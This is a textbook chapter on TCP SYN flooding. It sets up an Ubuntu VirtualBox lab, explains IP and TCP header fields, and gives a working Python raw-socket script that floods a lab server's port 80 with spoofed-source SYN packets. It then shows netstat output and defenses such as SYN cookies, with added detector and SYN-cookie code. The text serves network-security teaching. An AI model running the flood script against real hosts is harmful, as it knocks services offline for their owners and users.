21.1
The Basic Concept of the TCP SYN Flood
Figure 21-1 TCP SYN Flood Basic Concept
TCP communicates only after a connection has been established through a
3-way handshake. First, the client requests a connection by sending a SYN packet
to the server; the server responds with a SYN/ACK packet; finally, the client
sends an ACK packet and the connection is established. The weakness is that the
server allocates system resources as soon as it receives the SYN, before the
client has shown that it will ever complete the handshake. The system keeps a
record of each pending (half-open) connection in the backlog queue, and when this
queue is full it cannot accept any more requests. A TCP SYN Flood attack
transmits a large number of SYN packets, usually with spoofed source addresses so
that the SYN/ACKs are never answered, and fills the backlog queue so that
legitimate connection requests are refused.
21.2
Linux Installation
A TCP SYN Flood attack uses a “raw socket”, which lets the program fill in the
TCP and IP header fields arbitrarily, and the “sendto” method to transmit the
crafted packet. Windows blocks sending TCP segments through a raw socket for
security reasons, because PCs frequently become zombies and are used for DoS
attacks. Linux allows TCP to be sent with “sendto” on a raw socket, so simply
install Linux in VirtualBox to test the TCP SYN Flood attack.
• Linux Download
Download Ubuntu Linux (12.04.4 LTS Precise Pangolin) from the Ubuntu site
(releases.ubuntu.com/precise). Python is installed by default. Since the 64-bit
version can be slow in VirtualBox, it is preferable to select the 32-bit
version.
Figure 21-2 Linux Download
• Virtualbox Virtual Machine Creation
Type the “Name” as “linux”. Select “Linux” and “Ubuntu
(32-bit)” for each field.
Figure 21-3 Virtual Machine Creation
• Select Installer
Select [Settings] - [Storage] - [Empty] - [click on the disc icon] - [Choose a
virtual CD/DVD disk file], then select the Linux installation image that was
downloaded.
Figure 21-4 Select Installer
• Virtual Box Network Setting Confirmation
Make sure NAT is selected in the [Settings] - [Network] tab. NAT is normally
the default; if not, change the setting. With NAT the virtual machine has an
Internet connection, which the installer uses.
Figure 21-5 Confirming Virtual Box Network Configuration
• Installing Linux
Clicking the Linux image on the left side starts the installation. Click the
[Install Ubuntu] button and enter the information requested by the prompts; the
installation then completes easily.
Figure 21-6 Linux Install
• Enter the User Information
Enter the user information by entering the username and
password as “linux”.
Figure 21-7 Entering User Information
• Changing the Virtual Box Network Settings
Select [Internal Network] for this test. This connects the virtual PCs to one
another on a private network with no DHCP server, so addresses are set by hand.
Figure 21-8 Virtual Box Network Setting
• Changing the Linux Network Setting
Open the “/etc/network/interfaces” file and change it in the following
manner. First check the IP address of the hacker PC with the “ipconfig” command,
then assign an unused address from the same subnet to “address”.
Figure 21-9 Linux Network Setting
• Setting Linux hosts
Open the “/etc/hosts” file and add an entry in the following manner. Check
the IP address of the server PC and place it here, so that the name “server”
resolves to it.
Figure 21-10 Linux hosts File Setting
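As an added example for the two settings above (not a figure from the original page): a static address on the VirtualBox internal network, and a hosts entry so that the attack script can refer to the target as “server”. The attacker address 169.254.27.50 and the interface name eth0 are assumptions; the server address 169.254.27.229 is the one used by the script in this chapter.

```text
# /etc/network/interfaces  (attacker VM; the internal network has no DHCP)
auto lo
iface lo inet loopback

auto eth0
iface eth0 inet static
    address 169.254.27.50
    netmask 255.255.0.0

# /etc/hosts  (so socket.gethostbyname('server') resolves to the server PC)
127.0.0.1        localhost
169.254.27.229   server
```

Apply the interface change with “sudo ifdown eth0; sudo ifup eth0” (or reboot), then confirm with “ifconfig eth0” and “ping server”.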
• Confirming the Linux Installation
When the installation is complete, press the “Ctrl + Alt + T” key
combination to open the terminal. To run with root privileges, set the initial
root password by typing “sudo passwd root”. I set the password to be the same as
the username, “root”. Now log in as root using the “su -” command. In Ubuntu
12.04, Python 2.7.3 is installed by default.
Figure 21-11 Login as root
21.3
IP and TCP Headers Setting
In typical socket communication, the kernel fills in the IP and TCP headers
automatically. However, in order to transmit only a SYN packet using a raw
socket, the programmer must build the headers by hand. Because the kernel
expects the same byte layout as the C structures, the header must be laid out
exactly as it is in C. First, let's look at the structure of the IP header.
Figure 21-12 IP Header
The IP header is 20 bytes in total, from “Version” to “Destination Address”.
“Version” is 4, which indicates IPv4. “IHL” is the header length in 32-bit
words, so a value of 5 means 20 bytes. “Identification” can be any value.
“Flags” and “Fragment Offset” are both set to 0. “Time to Live” is set to 255,
the maximum the 8-bit field allows. “Protocol” is set to “socket.IPPROTO_TCP”.
“Total Length” and “Header Checksum” can be left at 0: with the IP_HDRINCL
option, the Linux kernel fills them in at transmission time.
Figure 21-13 IP Header File
Now let's set the TCP header. The IP header specifies the addresses and the
TCP header specifies the ports used for communication. The type of TCP segment
is determined by the “Flags” field; since a SYN Flood sends only SYN packets in
bulk, the SYN bit is set to 1 and the rest are 0.
Figure 21-14 TCP Header
“Source Port” is set to a varying value, and “Destination Port” is set to the
target port 80. “Sequence Number” and “Acknowledgment Number” can be any value.
“Data Offset” indicates where the header ends; since it is counted in 32-bit
words, a setting of 5 means a 20-byte header. Of the “Flags”, only SYN is set
to 1. “Window” is set to 5840, which was the common Linux default initial window
(four 1460-byte segments); the field itself allows values up to 65535.
“Checksum” is not filled in by the kernel for a raw TCP socket: the program must
compute it itself over the pseudo header and the TCP header, as the example in
21.4 does.
Figure 21-15 TCP Header File
To build the IP and TCP headers, the Python values must be converted into the
byte layout of the corresponding C structures. Python does this with the “pack”
function of the “struct” module. The following format characters map Python
types onto the appropriate C types.
Figure 21-16 Format Characters
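To check the layout described above and the checksum rule, here is an added example (not code from the original page) that builds an IPv4/TCP SYN with the same struct formats, computes the TCP checksum over the pseudo header, and then parses the packet back and verifies the checksum. It is pure byte manipulation, so it runs without a raw socket or root. The addresses and ports are constructed test values.

```python
import socket
from struct import pack, unpack

TCP_FLAG_NAMES = ("FIN", "SYN", "RST", "PSH", "ACK", "URG")  # bit 0 .. bit 5


def internet_checksum(data):
    """RFC 1071 checksum: one's-complement sum of 16-bit words, carries folded back."""
    data = bytearray(data)
    if len(data) % 2:                 # pad an odd-length buffer with one zero byte
        data.append(0)
    total = 0
    for i in range(0, len(data), 2):
        total += (data[i] << 8) | data[i + 1]
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def tcp_pseudo_header(src_ip, dst_ip, tcp_len):
    """Pseudo header covered by the TCP checksum: src, dst, zero, protocol, TCP length."""
    return pack("!4s4sBBH", socket.inet_aton(src_ip), socket.inet_aton(dst_ip),
                0, socket.IPPROTO_TCP, tcp_len)


def build_syn(src_ip, dst_ip, sport, dport, seq=0, window=5840):
    """40-byte IPv4 + TCP SYN using the same struct formats as the chapter's code.

    The TCP checksum is filled in. The IP checksum is left 0 (the kernel fills it
    under IP_HDRINCL); total length is set so the packet is also valid off-line.
    """
    ip_hdr = pack("!BBHHHBBH4s4s",
                  (4 << 4) | 5,           # version 4, IHL 5 words = 20 bytes
                  0, 40, 999, 0, 255,     # TOS, total length, ID, flags/offset, TTL
                  socket.IPPROTO_TCP, 0,  # protocol, header checksum (kernel fills)
                  socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    flags = 1 << 1                        # SYN only
    tcp_hdr = pack("!HHLLBBHHH", sport, dport, seq, 0,
                   5 << 4,                # data offset 5 words, reserved bits 0
                   flags, window, 0, 0)   # window, checksum placeholder, urgent ptr
    csum = internet_checksum(tcp_pseudo_header(src_ip, dst_ip, len(tcp_hdr)) + tcp_hdr)
    tcp_hdr = tcp_hdr[:16] + pack("!H", csum) + tcp_hdr[18:]   # checksum at offset 16
    return ip_hdr + tcp_hdr


def parse_packet(pkt):
    """Unpack IPv4 + TCP headers and verify the TCP checksum over the pseudo header."""
    (ver_ihl, _tos, _total_len, _ident, _frag, ttl, proto, _ip_csum,
     src, dst) = unpack("!BBHHHBBH4s4s", pkt[:20])
    ihl = (ver_ihl & 0x0F) * 4
    if ver_ihl >> 4 != 4 or ihl < 20 or proto != socket.IPPROTO_TCP:
        raise ValueError("not an IPv4/TCP packet")
    tcp = pkt[ihl:]
    (sport, dport, seq, ack, off_resv, flags, window,
     _tcp_csum, _urg) = unpack("!HHLLBBHHH", tcp[:20])
    pseudo = tcp_pseudo_header(socket.inet_ntoa(src), socket.inet_ntoa(dst), len(tcp))
    return {
        "src": socket.inet_ntoa(src), "dst": socket.inet_ntoa(dst), "ttl": ttl,
        "sport": sport, "dport": dport, "seq": seq, "ack": ack,
        "flags": {name for bit, name in enumerate(TCP_FLAG_NAMES) if flags & (1 << bit)},
        "window": window, "header_len": (off_resv >> 4) * 4,
        # summing the segment together with its own checksum must give 0
        "checksum_ok": internet_checksum(pseudo + tcp) == 0,
    }
```

Parsing your own crafted packet before sending it catches the classic raw-socket mistakes: a wrong data offset, a checksum computed without the pseudo header, or a byte-order slip such as applying htons() to the window and then packing it with “!H”, which on a little-endian host puts 53270 on the wire instead of 5840.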
21.4
TCP SYN Flood Example
The Python socket module provides a variety of functions. The most basic ones
transmit data after a connection has been established; in TCP, data is sent
only after the 3-way handshake has completed. For the “TCP SYN Flood” attack,
the packet has to be sent before any connection exists, so a different kind of
socket, the raw socket, is needed.
'''
Code Reference From
http://www.binarytides.com/python-syn-flood-program-raw-sockets-linux/
http://www.binarytides.com/python-packet-sniffer-code-linux/
'''
import socket, sys
from struct import *

def makeChecksum(msg): #(1)
    # Internet checksum: sum the 16-bit words, fold the carry back in,
    # then take the one's complement. bytearray() yields integers on
    # both Python 2 and Python 3.
    msg = bytearray(msg)
    if len(msg) % 2:                 # pad an odd-length buffer with a zero byte
        msg.append(0)
    s = 0
    for i in range(0, len(msg), 2):
        w = (msg[i] << 8) + msg[i+1]
        s = s + w
    s = (s >> 16) + (s & 0xffff)
    s = s + (s >> 16)
    s = ~s & 0xffff
    return s

def makeIPHeader(sourceIP, destIP): #(2)
    version = 4
    ihl = 5                          # 5 x 32-bit words = 20 bytes
    typeOfService = 0
    totalLength = 20 + 20            # IP header + TCP header, no payload
    ident = 999
    flagsOffSet = 0
    ttl = 255
    protocol = socket.IPPROTO_TCP
    headerChecksum = 0               # the kernel fills this in when it is 0
    sourceAddress = socket.inet_aton(sourceIP)
    destinationAddress = socket.inet_aton(destIP)
    ihlVersion = (version << 4) + ihl
    return pack('!BBHHHBBH4s4s',
                ihlVersion, typeOfService, totalLength, ident, flagsOffSet,
                ttl, protocol, headerChecksum, sourceAddress,
                destinationAddress) #(3)

def makeTCPHeader(port, checksum=0): #(4)
    sourcePort = port
    destinationPort = 80
    seqNumber = 0
    ackNumber = 0
    dataOffset = 5                   # 5 x 32-bit words = 20 bytes
    flagFin = 0
    flagSyn = 1                      # only SYN is set
    flagRst = 0
    flagPsh = 0
    flagAck = 0
    flagUrg = 0
    window = 5840                    # pack('!H') already writes network byte
                                     # order, so do not apply htons() as well
    urgentPointer = 0
    dataOffsetResv = (dataOffset << 4) + 0
    flags = (flagUrg << 5) + (flagAck << 4) + (flagPsh << 3) + \
            (flagRst << 2) + (flagSyn << 1) + flagFin
    return pack('!HHLLBBHHH',
                sourcePort, destinationPort, seqNumber, ackNumber,
                dataOffsetResv, flags, window, checksum, urgentPointer) #(5)

s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP) #(6)
s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) #(7)

for j in range(1, 20): #(8)
    for k in range(1, 255):
        for l in range(1, 255):
            sourceIP = "169.254.%s.%s" % (k, l) #(9)
            destIP = "169.254.27.229"
            ipHeader = makeIPHeader(sourceIP, destIP) #(10)
            tcpHeader = makeTCPHeader(10000 + j + k + l) #(11)
            sourceAddr = socket.inet_aton(sourceIP) #(12)
            destAddr = socket.inet_aton(destIP)
            placeholder = 0
            protocol = socket.IPPROTO_TCP
            tcpLen = len(tcpHeader)
            # pseudo header: source, destination, zero, protocol, TCP length
            psh = pack('!4s4sBBH', sourceAddr, destAddr, placeholder, protocol, tcpLen)
            psh = psh + tcpHeader
            tcpChecksum = makeChecksum(psh) #(13)
            tcpHeader = makeTCPHeader(10000 + j + k + l, tcpChecksum) #(14)
            packet = ipHeader + tcpHeader
            s.sendto(packet, (destIP, 0)) #(15)
The results of running the program can be seen in Wireshark on the hacker PC
and with the “netstat -n -p tcp” command in the Windows command prompt on the
server PC. Here we look at the command prompt output. The program is explained
as follows.
(1) Declaring the TCP Checksum Calculation Function: Calculate the TCP
checksum that protects the integrity of the transmitted segment. The pseudo
header, the TCP header and any data are split into 16-bit words, the words are
added with the carry folded back into the low 16 bits, and the one's complement
of the sum is the checksum.
(2)
Declaring IP Header Generating Function: Generates the IP Header, as was
previously described.
(3)
Creating IP Header Structure: Use the “pack” function to convert the format
of the structure used in the C language.
(4)
Declaring TCP Header Generating Function: Generates the TCP Header, as
previously described.
(5)
Creating TCP Header Structure: Use the “pack” function to convert the
format of the structure used in the C language.
(6)
Creating a raw socket: Create a socket object that allows the program to supply
the IP header and the TCP segment itself. Opening a raw socket requires root
privileges.
(7)
Setting the Socket Option: Adjust the socket options to allow developers to
generate an IP Header.
(8) Loop: Use a loop to send a large
number of SYN packets.
(9)
IP Setting: Specify the sender IP and the recipient IP. The sender IP is changed
on every packet, so that the server's SYN/ACK replies go to addresses that will
never answer and the half-open connections stay in the backlog. The recipient IP
can also be obtained with “socket.gethostbyname('server')”.
(10) Creating the IP Header: This function is called to create an IP
header and return it using the C language structure.
(11) Creating the TCP Header: Call the TCP header generation function.
The first call, with checksum 0, produces the header that is combined with the
pseudo header to compute the TCP checksum. For the source port, use values
above 10000, which stay clear of the well-known and registered ports.
(12) IP Structure Transformation: Convert the string data to the
“in_addr” structure using the “inet_aton” function.
(13) TCP checksum Calculation: Call the
function to calculate the TCP checksum.
(14) TCP Header Generation: Call the function again with the computed TCP
checksum to generate the final TCP header.
(15) Packet Transmission: Concatenate the IP header and the TCP header and
send the TCP SYN packet. Because the socket is raw, “sendto” transmits the
packet as-is, with no connection setup by the kernel.
Run the sample and then enter “netstat -n -p tcp” in the command prompt on
the Windows server PC; the following results are obtained. The rightmost column,
“SYN_RECEIVED”, shows connections that are half-open: the server has received a
SYN and sent its SYN/ACK, and is waiting for the final ACK that the spoofed
client will never send. Thousands of such entries are created, and each one
holds system state for a certain period until it times out. When a large number
of SYN packets are sent, service performance degrades or the service stops
responding altogether.
Figure 21-17 TCP Header File
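As an added example, not part of the original page: the following Python parses “netstat -n -p tcp” output in the Windows format seen here and reports, per listening port, how many connections are half-open and whether the pattern looks like a SYN flood. The sample output is constructed for this example, not a real capture, and the threshold and the “suspicious” rule are illustrative choices.

```python
from collections import defaultdict

# Constructed sample of `netstat -n -p tcp` output on the server PC (not a capture).
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    169.254.27.229:80      169.254.1.1:10003      SYN_RECEIVED
  TCP    169.254.27.229:80      169.254.1.2:10004      SYN_RECEIVED
  TCP    169.254.27.229:80      169.254.1.3:10005      SYN_RECEIVED
  TCP    169.254.27.229:80      169.254.2.1:10004      SYN_RECEIVED
  TCP    169.254.27.229:80      169.254.2.2:10005      SYN_RECEIVED
  TCP    169.254.27.229:80      169.254.27.1:52113     ESTABLISHED
  TCP    169.254.27.229:3389    169.254.27.1:52220     ESTABLISHED
  TCP    127.0.0.1:5357         127.0.0.1:49160        TIME_WAIT
"""


def parse_netstat(text):
    """Return one dict per TCP row; header lines and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4 or parts[0].upper() != "TCP":
            continue
        _proto, local, foreign, state = parts
        lhost, lport = local.rsplit(":", 1)     # rsplit also copes with [::1]:port
        fhost, fport = foreign.rsplit(":", 1)
        rows.append({"local_host": lhost, "local_port": int(lport),
                     "foreign_host": fhost, "foreign_port": int(fport),
                     "state": state})
    return rows


def half_open_report(rows, threshold=3):
    """Per local port: half-open vs established counts, distinct peers, and a verdict.

    A port is flagged when its SYN_RECEIVED count reaches `threshold` and exceeds
    the number of established connections (many half-open entries, few peers
    that ever finish the handshake, is the SYN-flood signature).
    """
    by_port = defaultdict(lambda: {"half_open": 0, "established": 0, "peers": set()})
    for r in rows:
        entry = by_port[r["local_port"]]
        if r["state"] == "SYN_RECEIVED":
            entry["half_open"] += 1
            entry["peers"].add(r["foreign_host"])
        elif r["state"] == "ESTABLISHED":
            entry["established"] += 1
    report = {}
    for port, e in by_port.items():
        report[port] = {
            "half_open": e["half_open"],
            "established": e["established"],
            "distinct_peers": len(e["peers"]),
            "suspicious": e["half_open"] >= threshold
                          and e["half_open"] > e["established"],
        }
    return report


if __name__ == "__main__":
    for port, r in sorted(half_open_report(parse_netstat(SAMPLE_NETSTAT)).items()):
        print(port, r)
```

On a real host the threshold should be set well above the normal number of in-flight handshakes for that service; a busy web server legitimately shows a handful of SYN_RECEIVED rows at any moment, and it is the sustained count, together with source addresses spread across a whole subnet, that distinguishes a flood.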
With the TCP SYN Flood attack, the system falls into denial of service when
the backlog queue is full. Increasing the capacity of the backlog queue (on
Linux, “net.ipv4.tcp_max_syn_backlog”) is therefore one defense, although it
only raises the cost of the attack. Another method is “syncookies”
(“net.ipv4.tcp_syncookies” on Linux), which lets the server avoid allocating
resources until the 3-way handshake has completed, by encoding the connection
state into the sequence number of its own SYN/ACK. It is also possible to block
the attack at a router or firewall using an intercept mode or a watch mode. In
intercept mode, the router answers the client's SYN itself; only after the
handshake with the client has been established does the router open a
connection to the server and join the two. In watch mode, the router monitors
connection attempts passively, and if a connection has not been established
within a predetermined amount of time, it resets it.
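SYN cookies are the defense worth seeing in code. The following is an added, simplified illustration written for this page, not the Linux kernel's algorithm: the server packs a time counter, an MSS index and a keyed hash of the connection 4-tuple and client ISN into the 32-bit initial sequence number of its SYN/ACK, stores nothing, and reconstructs what it needs when the final ACK arrives. The MSS table, the bit layout and the two-tick validity window are assumptions made for the example; the secret and addresses in the test are constructed values.

```python
import hashlib
import hmac
import socket
import struct

# MSS values the cookie can encode in 2 bits (an illustrative table, not Linux's).
MSS_TABLE = (536, 1300, 1440, 1460)
MAX_AGE = 2   # accept cookies from the current and the previous counter tick


def _cookie_hash(secret, src, dst, sport, dport, client_isn, counter, mss_idx):
    """24-bit keyed hash binding the cookie to the 4-tuple, client ISN and tick."""
    msg = struct.pack("!4s4sHHIIB", socket.inet_aton(src), socket.inet_aton(dst),
                      sport, dport, client_isn & 0xFFFFFFFF,
                      counter & 0xFFFFFFFF, mss_idx)
    digest = hmac.new(secret, msg, hashlib.sha256).digest()
    return struct.unpack("!I", b"\x00" + digest[:3])[0]


def make_cookie(secret, src, dst, sport, dport, client_isn, counter, mss):
    """Server ISN for the SYN/ACK: [6-bit tick][2-bit MSS index][24-bit hash].

    Called when a SYN arrives; nothing is stored in the backlog for it.
    """
    fits = [i for i, m in enumerate(MSS_TABLE) if m <= mss]
    mss_idx = fits[-1] if fits else 0            # largest table MSS <= offered MSS
    h = _cookie_hash(secret, src, dst, sport, dport, client_isn, counter, mss_idx)
    return ((counter & 0x3F) << 26) | (mss_idx << 24) | h


def check_cookie(secret, src, dst, sport, dport, seq, ack, counter, max_age=MAX_AGE):
    """Validate the final ACK of a handshake for which no state was stored.

    seq/ack are the ACK segment's fields (client ISN + 1, our ISN + 1).
    Returns the negotiated MSS on success, None if the cookie is stale or forged.
    """
    cookie = (ack - 1) & 0xFFFFFFFF
    client_isn = (seq - 1) & 0xFFFFFFFF
    tick = cookie >> 26
    mss_idx = (cookie >> 24) & 0x3
    age = (counter - tick) & 0x3F                # ticks elapsed, modulo 64
    if age >= max_age:
        return None                              # too old: could be a replay
    expected = _cookie_hash(secret, src, dst, sport, dport, client_isn,
                            counter - age, mss_idx)
    if (cookie & 0xFFFFFF) != expected:
        return None                              # forged or from another tuple
    return MSS_TABLE[mss_idx]
```

The flood from 21.4 now costs the server nothing but one HMAC per SYN: the spoofed sources never send the ACK, so no entry is ever created, while a real client's ACK carries enough information (its own ISN in “seq”, the cookie in “ack”, the 4-tuple in the headers) to rebuild the connection. The price is that TCP options offered in the SYN are lost except the MSS, which is why real implementations encode an MSS index exactly as done here.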